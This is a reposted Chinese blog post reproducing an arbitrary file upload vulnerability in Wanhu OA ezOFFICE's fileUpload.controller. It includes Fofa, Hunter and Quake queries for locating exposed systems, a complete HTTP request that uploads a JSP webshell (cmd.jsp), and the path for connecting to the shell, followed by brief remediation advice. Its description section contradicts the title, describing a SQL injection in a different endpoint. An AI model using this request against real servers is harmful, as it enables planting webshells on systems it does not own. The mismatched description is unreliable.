万户OA-ezOFFICE fileUpload.controller 任意文件上传漏洞

admin 2024年9月24日10:50:12评论24 views字数 979阅读3分15秒阅读模式
 

漏洞描述

万户OA-ezOFFICE DocumentEdit_unite.jsp 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。

网络空间测绘

Fofa

app="万户网络-ezOFFICE"

Hunter

app.name=="万户 Ezoffice OA"

Quake

app:"万户ezOFFICE协同管理平台"
万户OA-ezOFFICE fileUpload.controller 任意文件上传漏洞
image-20240903020635725

漏洞复现

发送请求包上传文件

POST /defaultroot/upload/fileUpload.controller HTTP/1.1
Host:
User-Agent:Mozilla/5.0(Windows NT 6.1;Win64; x64; rv:50.0)Gecko/20100101Firefox/50.0
Accept-Encoding: gzip, deflate
Accept:*/*
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Length: 773

--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Disposition: form-data; name="file"; filename="cmd.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

《webshell》
--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0--
万户OA-ezOFFICE fileUpload.controller 任意文件上传漏洞
image.png

连接木马 /defaultroot/upload/html/xxxxxxxxxx.jsp

万户OA-ezOFFICE fileUpload.controller 任意文件上传漏洞
image.png

修复建议

1、如⾮必要,禁⽌公⽹访问该系统。

2、用防火墙等安全设备设定访问规则,只允许白名单中的设备访问。

3、及时升级产品到最新版本。

原文始发于微信公众号(凝聚力安全团队):【漏洞复现】万户OA-ezOFFICE fileUpload.controller 任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月24日10:50:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   万户OA-ezOFFICE fileUpload.controller 任意文件上传漏洞http://cn-sec.com/archives/3201657.html

发表评论

匿名网友 填写信息